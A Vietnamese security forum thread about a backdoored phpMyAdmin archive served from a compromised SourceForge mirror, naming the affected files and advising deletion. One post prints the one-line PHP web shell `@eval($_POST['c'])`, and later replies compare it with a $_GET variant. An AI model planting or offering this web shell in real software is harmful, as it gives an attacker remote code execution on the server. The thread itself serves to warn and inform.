banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits Backdoor "trốn" trong phần mềm PhpMyadmin trong SourceForge  XML
  [Discussion]   Backdoor "trốn" trong phần mềm PhpMyadmin trong SourceForge 28/09/2012 20:04:18 (+0700) | #1 | 269779
[Avatar]
tranhuuphuoc
Moderator

Joined: 05/09/2004 06:08:09
Messages: 865
Location: Lầu Xanh
Offline
[Profile] [PM] [WWW]
Người viết tin tức cho báo tuoitre này hình như hiểu nhầm, dùng từ "hàng triệu", trong tập tin nén phpMyAdmin 3.5.2.2-all-languages.zip này có chứa 1 tập tin js/cross_framing_protection.js và server_sync.php , chỉ những bạn nào download mirror sourceforge từ cdnetworks-kr-1 mới bị.

Tức là bạn download từ đây, thì bạn nên xóa ngay và tìm nguồn download khác thay vì mirror cdnetworks-kr-1 (hiện giờ mirror download này đã bị xóa trên sourceforge)
http://cdnetworks-kr-1.dl.sourceforge.net/project/phpmyadmin/phpMyAdmin/3.4.3.2/phpMyAdmin-3.4.3.2-all-languages.tar.gzhttp

Nguồn
http://nhipsongso.tuoitre.vn/Nhip-song-so/513467/Hang-trieu-website-gap-nguy-vi-cua-hau-trong-phpMyAdmin.html
[Up] [Print Copy]
  [Discussion]   Backdoor "trốn" trong phần mềm PhpMyadmin trong SourceForge 28/09/2012 22:03:48 (+0700) | #2 | 269782
[Avatar]
xuanphongdocco
Member

[Minus]    0    [Plus]
Joined: 19/08/2009 08:25:03
Messages: 247
Offline
[Profile] [PM]
Chỉ với 26 kí tự, thật bá đạo smilie

<?php
@eval($_POST['c']);
?>
Xuân Phong Nguyễn
[Up] [Print Copy]
  [Discussion]   Backdoor "trốn" trong phần mềm PhpMyadmin trong SourceForge 30/09/2012 09:19:02 (+0700) | #3 | 269800
[Avatar]
sasser01052004
Member

[Minus]    0    [Plus]
Joined: 20/09/2010 01:27:29
Messages: 150
Location: /home/sasser
Offline
[Profile] [PM]

xuanphongdocco wrote:
Chỉ với 26 kí tự, thật bá đạo smilie

<?php
@eval($_POST['c']);
?> 


Sao không phải là $_GET nhỉ, chỉ còn 25 ki tự ^^

Ask me why, don't ask me what.
[Up] [Print Copy]
  [Discussion]   Backdoor &quot;trốn&quot; trong phần mềm PhpMyadmin trong SourceForge 30/09/2012 09:53:43 (+0700) | #4 | 269801
[Avatar]
xuanphongdocco
Member

[Minus]    0    [Plus]
Joined: 19/08/2009 08:25:03
Messages: 247
Offline
[Profile] [PM]

sasser01052004 wrote:

xuanphongdocco wrote:
Chỉ với 26 kí tự, thật bá đạo smilie

<?php
@eval($_POST['c']);
?> 


Sao không phải là $_GET nhỉ, chỉ còn 25 ki tự ^^

 


Dùng $_GET hay $_POST sẽ khác nhau về giới hạn độ dài của parameter 'c' đó bác. Bác cứ bỏ vào localhost mà test là biết.
Xuân Phong Nguyễn
[Up] [Print Copy]
  [Discussion]   Backdoor "trốn" trong phần mềm PhpMyadmin trong SourceForge 01/10/2012 13:12:35 (+0700) | #5 | 269811
meotronvn
Member

[Minus]    0    [Plus]
Joined: 04/04/2012 22:33:42
Messages: 3
Offline
[Profile] [PM]
còn Bồ nào có bản chứa cái này không cho mình đường link down về xem chút...
[Up] [Print Copy]
  [Discussion]   Backdoor "trốn" trong phần mềm PhpMyadmin trong SourceForge 01/10/2012 15:15:25 (+0700) | #6 | 269817
[Avatar]
gamma95
Researcher

Joined: 20/05/2003 07:15:41
Messages: 1377
Location: aaa&quot;&gt;
Offline
[Profile] [PM] [ICQ]
backdoor khá thô thiển =]]]
Cánh chym không mỏi
lol
[Up] [Print Copy]
  [Discussion]   Backdoor "trốn" trong phần mềm PhpMyadmin trong SourceForge 01/10/2012 22:47:18 (+0700) | #7 | 269829
ga_cum06
Member

[Minus]    0    [Plus]
Joined: 04/05/2008 19:01:15
Messages: 29
Offline
[Profile] [PM]
cho thêm chữ hàng triệu để câu view đó mà smilie) vừa search google 1 số thứ về nginx đọc tin này trong blog của bác. vào hva lại thấy smilie)
...Ước mơ xây trường học cho trẻ em nghèo Việt Nam
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|